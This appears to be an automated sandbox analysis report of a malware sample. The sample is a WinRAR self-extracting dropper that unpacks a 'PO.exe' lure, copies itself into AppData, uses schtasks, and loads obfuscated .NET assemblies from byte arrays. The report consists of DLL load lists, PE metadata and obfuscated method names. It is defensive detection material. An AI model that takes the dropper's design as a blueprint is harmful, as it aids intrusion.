Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe	Section loaded: ntmarta.dll

Source: C:\Users\user\Desktop\owKQ0b029a.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: owKQ0b029a.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: owKQ0b029a.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: owKQ0b029a.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: owKQ0b029a.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: owKQ0b029a.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: owKQ0b029a.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: owKQ0b029a.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: owKQ0b029a.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: owKQ0b029a.exe

Source: owKQ0b029a.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: owKQ0b029a.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: owKQ0b029a.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: owKQ0b029a.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: owKQ0b029a.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: PO.exe.0.dr, CalculatorMain.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: QntRsaVyLKlY.exe.7.dr, CalculatorMain.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 7.2.PO.exe.7500000.7.raw.unpack, IrbWprQUijEdHaKwJB.cs	.Net Code: xQuv9J7gZ6 System.Reflection.Assembly.Load(byte[])
Source: 7.2.PO.exe.43a4cc0.4.raw.unpack, IrbWprQUijEdHaKwJB.cs	.Net Code: xQuv9J7gZ6 System.Reflection.Assembly.Load(byte[])
Source: 7.2.PO.exe.43feae0.1.raw.unpack, IrbWprQUijEdHaKwJB.cs	.Net Code: xQuv9J7gZ6 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\owKQ0b029a.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0\__tmp_rar_sfx_access_check_5598984

Jump to behavior

Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C82846 push ecx; ret	0_2_00C82859
Source: C:\Users\user\Desktop\owKQ0b029a.exe	Code function: 0_2_00C81B98 push eax; ret	0_2_00C81BB6
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 15_2_06ACE5CF push es; ret	15_2_06ACE5E0
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Code function: 15_2_06AC1810 push es; ret	15_2_06AC1820

Source: PO.exe.0.dr	Static PE information: section name: .text entropy: 7.901834215729053
Source: QntRsaVyLKlY.exe.7.dr	Static PE information: section name: .text entropy: 7.901834215729053

Source: 7.2.PO.exe.7500000.7.raw.unpack, RweiFQ8MNVqb7kU3qP.cs	High entropy of concatenated method names: 'jSqyx8fSBd', 'A41yCp0K6R', 'ToString', 'w4fy3q05Db', 'jU2y1ngNhh', 'kZgyUhWV0S', 'PBaycnNhYC', 'hODyYXUcJX', 'wkxy76mi1A', 'wQeyQGwGrq'
Source: 7.2.PO.exe.7500000.7.raw.unpack, LKQT68mH5ASHthJwl3.cs	High entropy of concatenated method names: 'hdNJAM6wC7', 'MksJ64gGyW', 'aXvJG8IDAW', 'wuAJwlH512', 'KdbJZoOywH', 'NY2JOvRyLh', 'mZjJuYIxhT', 'nW5JVTTTNu', 'l8TJnANFOX', 'vcUJDLQ0dI'
Source: 7.2.PO.exe.7500000.7.raw.unpack, DgMo1a2TEnBVuP9N9q.cs	High entropy of concatenated method names: 'mgOyPih1ab', 'wF2yEVJpLK', 'sDNR4wS2Un', 'f6xRXlQseZ', 'vWDyDVtyQ6', 'L2yy0h3Hnv', 'UZQymixqZR', 'H10ytw8doO', 'i7SygBVJxq', 'PeTyk2EmFt'
Source: 7.2.PO.exe.7500000.7.raw.unpack, x3jKeUAdnBO4kHagia.cs	High entropy of concatenated method names: 'd4i1td3XwD', 'eaf1gosTFY', 'tWW1koOaXv', 'hiD189ZWv6', 'kGi1sJd5Lg', 'Pmb126vSLo', 'PFs1qNrinI', 'tdo1Po6afc', 'FqO1rxc7un', 'Mgl1E4aAZM'
Source: 7.2.PO.exe.7500000.7.raw.unpack, BcPGxJGNwBKAHLOZ5B.cs	High entropy of concatenated method names: 'WSyYpAJOyI', 'TE6Y1kYrEl', 'EXDYcF7Rqh', 'RCVY78qk4x', 'zv4YQ91o7S', 'AJlcsOZwLV', 'JW8c2tZYXs', 'tDxcqkSLic', 'wxJcPRWv01', 'CwZcrlJ3VV'
Source: 7.2.PO.exe.7500000.7.raw.unpack, DN1BMmUSUujPnlpeUe.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'TvWLrFLTsu', 'qcsLEHEbid', 'SB7LzW5q1B', 'Mtsj4RkLWC', 'VBhjXS8bJN', 'P9wjLBx7o7', 'EgpjjJDpK7', 'RxNZgl4Irbd6PbUn9ni'
Source: 7.2.PO.exe.7500000.7.raw.unpack, eiSH7gzGM2qUasCfST.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xbVMJEZEYQ', 'aoyMb9sZbR', 'VZoMea5cuH', 'YQ6MytHiSY', 'DDeMRqZgA5', 'wLPMMn3MQ7', 'AQEMWhaliT'
Source: 7.2.PO.exe.7500000.7.raw.unpack, OXOCYHtTvwly4MyDvr.cs	High entropy of concatenated method names: 'OSpbn7OWGX', 'JKjb0evbRq', 'aExbtwro56', 'LYZbgpvCrI', 'Nekbw7nYsf', 'I5Qb5d8Hiy', 'nCobZgEf90', 'JQBbOHf9Pe', 'hQIba2mfqf', 'T1EbusIVWx'
Source: 7.2.PO.exe.7500000.7.raw.unpack, UcoK1FuF7y8QYluRJb.cs	High entropy of concatenated method names: 'QL473lh3MT', 'GBu7UpGCZ7', 'eAM7Y9TSc4', 'Qa2YE8lWLd', 'HqtYz2n4Fu', 'gkB74jwsIX', 'Rwh7XHnY6s', 'uId7LmCSnW', 'VIe7jc3kcc', 'k0R7vcAG8q'
Source: 7.2.PO.exe.7500000.7.raw.unpack, Gov6glwCQ97H0Limap.cs	High entropy of concatenated method names: 'VuIG52oSRQeseG4Mn2S', 'GlXTSqoD9V3brRrr2OQ', 'uq3bGBoLvTrZu9Cr1o6', 'GkkYR3UgYE', 'Jw2YMlS89Y', 'v9yYWL7S66', 'Xj8jsCo0i4wgrGl7P2J', 'X0QvNxoJ5yEiaHtlmqU'
Source: 7.2.PO.exe.7500000.7.raw.unpack, IrbWprQUijEdHaKwJB.cs	High entropy of concatenated method names: 'LoTjpQ6gm0', 'H5Dj3Glilr', 'Wvgj1U7ZrV', 'EwRjUJrAfJ', 'tgpjc4WWQK', 'JWhjYEatKA', 'yisj7re6Cn', 'aFwjQDXJ6W', 'EY9jioN6jG', 'toQjxSAuK1'
Source: 7.2.PO.exe.7500000.7.raw.unpack, B2Ep1wrKg8qEfTObHH.cs	High entropy of concatenated method names: 'PjpRGnFayt', 'e5aRwmAd3B', 'aLPR5v1ZeO', 'BRtRZIUA8O', 'SKkRtGRB3V', 'fEGROaOWxa', 'Next', 'Next', 'Next', 'NextBytes'
Source: 7.2.PO.exe.7500000.7.raw.unpack, mBUeiAkjcrgNLlTDqo.cs	High entropy of concatenated method names: 'ToString', 'x8leDYyk1d', 'fanewSqf8H', 'ICUe59hlfc', 'uMdeZXqNUL', 'LaVeOH735h', 'QxNeamDkG4', 'Fpbeu8vZ3N', 'U3keVVD1h0', 'ovGeTjW7PX'
Source: 7.2.PO.exe.7500000.7.raw.unpack, I9emTW1si3A509cO3Q.cs	High entropy of concatenated method names: 'Dispose', 'h6AXrSWDNA', 'j9JLwyc7oe', 'H9qffBn4X4', 'Dr7XEyD28H', 'EDpXzQUWbI', 'ProcessDialogKey', 'oSKL42Ep1w', 'Bg8LXqEfTO', 'oHHLL6ZIQH'
Source: 7.2.PO.exe.7500000.7.raw.unpack, Y7yD28PH6DpQUWbIbS.cs	High entropy of concatenated method names: 'o1eR3kU3kg', 'ufnR1s1dq2', 'SPXRUifJEn', 'agdRcpL6R8', 'jT6RYAmEpE', 'W1qR7eXgLu', 'i9DRQHj4QV', 'Vj3Riu7y1a', 'hQtRxMWpWc', 'oldRC69IXN'
Source: 7.2.PO.exe.7500000.7.raw.unpack, htcMop69blRljZCVu8.cs	High entropy of concatenated method names: 'E8BUBK0qTJ', 'IH1USyhZn5', 'P8lUAcYIbw', 'URUU6NeM6h', 'pM9UbWPbyw', 'gr3UefmcYE', 'WwWUyHuJed', 'JBqURnCNZy', 'kZLUM5wJBd', 'HoZUW638p7'
Source: 7.2.PO.exe.7500000.7.raw.unpack, kB1m3iLkQwbft8i78e.cs	High entropy of concatenated method names: 'kR69R5CMS', 'WpCBIMyj8', 'iHuSnKcVp', 'eZ2hlR9Go', 'So76utccw', 'R4edmi8Ny', 'fhRqvwyWuxLCkWGH9Z', 'iSm30QC0X5lFtUgo9H', 'd0XRTetyR', 'S0jWJdMsR'
Source: 7.2.PO.exe.7500000.7.raw.unpack, NRIjW9Tc0VVQBypkJ3.cs	High entropy of concatenated method names: 'kvI7oIDyyS', 't8Y7N7Jo72', 'aIo79EToFP', 'Fne7BOZmJ4', 'AVV7KSV51w', 'RdT7SedPVd', 'Fny7hHAc7N', 'flI7A6chGO', 'yES76s7JhA', 'j8R7dmoFU0'
Source: 7.2.PO.exe.7500000.7.raw.unpack, PRxlWidxa1R4F3MMQC.cs	High entropy of concatenated method names: 'C3ycKA7fKo', 'vLlchqxXgE', 'Wq6U5tSWpq', 'rQVUZ2iuNe', 'aWOUOew3VU', 'cbCUaeabhy', 'kgZUu99wFF', 'pSuUVParlW', 'QfJUTYPs7C', 'gFIUn9L3V8'
Source: 7.2.PO.exe.7500000.7.raw.unpack, ci7MkkvfGKgms55ENS.cs	High entropy of concatenated method names: 'FEoX73jKeU', 'FnBXQO4kHa', 'e9bXxlRljZ', 'nVuXC80Rxl', 'fMMXbQCScP', 'GxJXeNwBKA', 'eYSb8ZNOmDmuQd0ehj', 'CaXEPP2XPThNe5eC4E', 'pvIXX9CopU', 'O3tXjvxuBm'
Source: 7.2.PO.exe.7500000.7.raw.unpack, To5JpVX4YjBwk1ElpU2.cs	High entropy of concatenated method names: 'KtnMoYck7s', 'wWSMNkp0nZ', 'svIM9Z8I04', 'HWuMBEIEB8', 'O6pMKyU2S7', 'oNkMSxtEIs', 'QGZMhZSZT6', 'SflMAO0Htg', 'EfMM6hiHum', 'ci4Mdm7B7N'
